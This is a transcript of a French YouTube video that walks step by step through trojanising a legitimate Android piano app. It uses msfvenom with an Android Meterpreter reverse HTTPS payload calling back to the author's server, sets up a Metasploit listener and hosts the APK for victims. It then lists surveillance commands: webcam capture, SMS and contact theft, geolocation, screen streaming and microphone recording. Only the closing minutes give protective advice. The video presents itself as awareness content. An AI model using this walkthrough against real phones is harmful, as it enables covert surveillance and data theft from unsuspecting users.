Et bonjour à tous, je suis Processus TF et aujourd'hui on se retrouve pour une nouvelle vidéo sur comment éviter de se faire pirater son téléphone. Dans la vidéo d'aujourd'hui, on va voir comment prendre le contrôle d'un téléphone avec une application malveillante et donc comment justement s'en protéger. Alors je vois énormément de gens télécharger des applications à droite à gauche pour avoir par exemple des jeux craqués ou des applications craquées, tout ça pour pas payer quelques euros. Et au final, une application craquée, ça veut dire que quelqu'un y a touché, ça veut dire que quelqu'un a modifié le code à l'intérieur et potentiellement il a pu injecter du code malveillant dans cette application craquée. C'est ce qu'on va voir aujourd'hui. On a une application tout à fait légitime, une application de piano, donc c'est un clavier de piano. En fait, ça nous permet de jouer du piano sur notre téléphone Android et on va modifier cette application pour injecter à l'intérieur du code malveillant et on verra qu'ensuite, en lançant l'application sur un téléphone, eh bien, on récupère une connexion sur un serveur distant et on peut faire absolument tout ce qu'on veut, prendre des captures de webcam, récupérer la liste des conversations téléphoniques, des conversations SMS, des contacts envoyés, des SMS, bref, on a vraiment le contrôle total sur ce téléphone. On se retrouve donc dans le répertoire qui contient notre application légitime, donc Piano Keyboard 2017, que j'ai téléchargé donc depuis APK Pure. Donc elle est tout à fait légitime et je vais pouvoir générer un code malveillant que je vais injecter à l'intérieur avec MSF Venom. L'option "-X me permet de fournir une application légitime dans laquelle injecter notre code malveillant et l'option "-P va nous permettre de définir le type de payload qu'on veut utiliser. Chez nous ce sera donc de l'Android, Meterpreter. Et ici, pour éviter tout blocage, si par exemple notre victime est connectée sur un réseau en Wi-Fi sur lequel on a un pare-feu qui fait de l'inspection de paquets ou de l'inspection de trafic, eh bien on va faire une connexion de type reverse HTTPS. Donc de cette façon, on sera considéré comme du trafic web sur du TCP 443 et donc on ne sera pas bloqué par un pare-feu éventuellement sur le réseau de notre victime. Donc reverse HTTPS lhost égale youtube.lestutos-de-processus.fr, lport égale 443 et -o pour spécifier notre fichier de sortie, ici youtube.apk. MSF Venom va tout seul décompiler l'application Piano Keyboard, il va générer un code malveillant en reverse HTTPS et ensuite il va ce qu'on appelle hooker, c'est-à-dire qu'il va trouver une fonction qui lance une fenêtre dans Piano Keyboard pour y injecter, pour la surcharger afin d'injecter notre code malveillant lorsqu'on va utiliser l'application. De cette façon, ce sera totalement transparent pour l'utilisateur. Lui, il va pouvoir jouer du piano tout simplement depuis l'application d'origine, sauf que lorsqu'elle va se lancer, eh bien, elle va injecter, elle va lancer notre code malveillant et on pourra récupérer donc un payload de type reverse HTTPS. Ici, ça fixe les permissions pour qu'on puisse faire absolument tout ce qu'on veut, passer des appels téléphoniques, récupérer l'ensemble des contacts, prendre des captures de webcam, donc frontale ou alors dorsale. Et ensuite, ça va recompiler l'application et l'assigner. Ici, on se retrouve donc sur une autre machine attaquante. Donc c'est un simple serveur web sous Apache sur lequel j'ai déposé notre youtube.apk. Donc notre victime pourra télécharger donc cette application depuis notre serveur web. Je vais tout de suite lancer un MSF console-Q, donc la console Metasploit, afin de lancer notre listener pour récupérer la connexion reverse HTTPS. Ici donc, on lance notre use multi-handler afin de configurer donc notre listener. Set payload Android, Meterpreter, reverse HTTPS. On va ensuite faire notre set lhost. Ici donc on est sur un serveur OVH que j'utilise pour mes tests. Set lport et ensuite exploit. Ici donc on a réussi à lancer notre listener. On se retrouve tout de suite sur notre téléphone de test. Et donc à présent, si sur mon téléphone de ma victime, je vais sur le site youtube.lestutos-de-processus.fr. Ici, j'ai bien une application youtube.apk. Je peux la télécharger. Ici, je télécharge mon fichier. Je clique sur ouvrir. J'installe notre application. Et donc, une fois que mon application est installée,
je vais sur le bureau. Ici, j'ai mon application qui me demande plein de permissions, mais comme la plupart des utilisateurs, je clique sur continuer sans vérifier. Et ici, j'ai bien une connexion qui s'est prise dans mon listener. Ici, ma victime continue de jouer du piano. Et moi, de mon côté, je peux faire un sysinfo pour voir les détails de la connexion. Je suis bien sur un Android 10. Je peux faire un webcam list pour lister les webcams disponibles sur mon téléphone. Et ici, je peux faire un webcam snap, par exemple avec la caméra arrière. Donc, -i1 pour prendre la back caméra. Ici, je vais tenir la caméra juste devant mon PC. Et vous allez voir l'écran de mon listener. J'attends quelques secondes le temps que la photo soit prise. Voilà. Et ici, si je vais sur mon navigateur internet, je vais actualiser le site, puisque ici j'étais dans mon listener, donc dans le répertoire Apache. Et ici je vois que j'ai bien la photo de mon listener qui était en cours sur ma victime. Si je fais un help, ici on voit le détail de toutes les commandes disponibles. Alors je peux avoir la liste des applications installées, je peux installer une application à partir d'une URL, par exemple vers un APK, je peux lancer une application, en désinstaller une, je peux géolocaliser ma victime. Ici, contrôler ce qu'on appelle le wake lock, donc si l'appareil peut se verrouiller ou déverrouiller. Je peux régler le mode de sonnerie, donc si je veux mettre la sonnerie ou alors le laisser en mode vibreur, envoyer des SMS depuis le téléphone de ma victime. Je peux cacher l'application qu'il a installée, donc l'application piano. Ici, la même façon, géolocate si je suis en Wi-Fi ou alors en 4G. Je peux récupérer la totalité des SMS que ma victime a envoyés, je peux récupérer sa liste de contacts, son historique d'appel, vérifier si le téléphone est routé ou non, lancer une application, à peu près de la même façon qu'en dessous. Ici, Play a Waveform Audio File, je peux lancer une musique ou un son sur le téléphone de la victime. Je peux donc ici webcam list et webcam snap, donc lister les webcams, donc frontale et à l'arrière, et je peux prendre une capture. Je peux également streamer, donc de cette façon j'aurai dans un navigateur internet le stream en continu de la webcam du téléphone. Ici je peux démarrer un chat vidéo, je peux enregistrer le microphone, je peux prendre des captures d'écran, je peux prendre donc un screen share, donc c'est-à-dire avoir l'écran de ma victime en temps réel de la même façon dans un navigateur internet. Et puis ensuite plein d'autres commandes qui me permettent de lancer un shell sur ma victime pour pouvoir exécuter des commandes. Je peux également download des fichiers, upload des fichiers, c'est-à-dire que je peux récupérer la totalité des photos qui se trouvent sur le téléphone. Je peux regarder l'écran de ma victime par exemple quand il va se connecter sur ses applications bancaires, etc. Bref, c'est vraiment quelque chose de dangereux. Alors évidemment cette vidéo elle est à but instructif, c'est pas du tout pour vous montrer comment pirater, c'est plus pour vous mettre en garde des dangers des applications. Elles sont pas forcément malveillantes au premier abord. Ici c'est juste une application pour jouer du piano sur son téléphone, elle n'avait pas du tout l'air malveillante, et pourtant il y a des processus qui peuvent s'exécuter en arrière-plan, et c'est vraiment ça qui est important de savoir. Faut savoir que c'est possible pour pouvoir se dire effectivement je vais peut-être réfléchir à deux fois avant de télécharger des applications n'importe comment. Alors pour répondre à la question de cette vidéo, comment ne pas se faire pirater son téléphone, et bien tout simplement ne pas télécharger d'applications craquées. Toujours télécharger les applications depuis les stores officiels, donc l'App Store pour les téléphones sous iOS, le Google Play Store pour les téléphones sous Android, et mettre un antivirus. Ça paraît bête, mais il y a encore trop de monde qui n'a pas d'antivirus sur son téléphone. Tout le monde en met sur son ordinateur, et pourtant la majorité des données des utilisateurs sont sur leur téléphone. Que ce soit vos photos, vos accès à vos comptes bancaires, vos mots de passe, votre double authentification, tout se trouve sur votre téléphone, et pourtant il y a encore trop peu de monde qui met un antivirus sur son téléphone. Alors évidemment, vous allez perdre de la batterie plus rapidement, puisque ça va solliciter en permanence votre téléphone.
mais il vaut mieux perdre un petit peu de batterie quotidiennement que l'intégralité de vos données pour toute votre vie. C'est vraiment un choix à faire. Il n'y a pas de solution magique dans tous les cas. Donc voilà, c'est vraiment quelque chose que je vous conseille. Toujours télécharger des applications légitimes depuis les stores officiels et surtout avoir un antivirus sur son téléphone. Bref, c'est tout pour aujourd'hui. Si vous avez aimé cette vidéo, n'hésitez pas à liker et à vous abonner à la chaîne si ce n'est pas déjà fait. Moi je vous dis à très vite pour de nouvelles vidéos et d'ici là, portez-vous bien.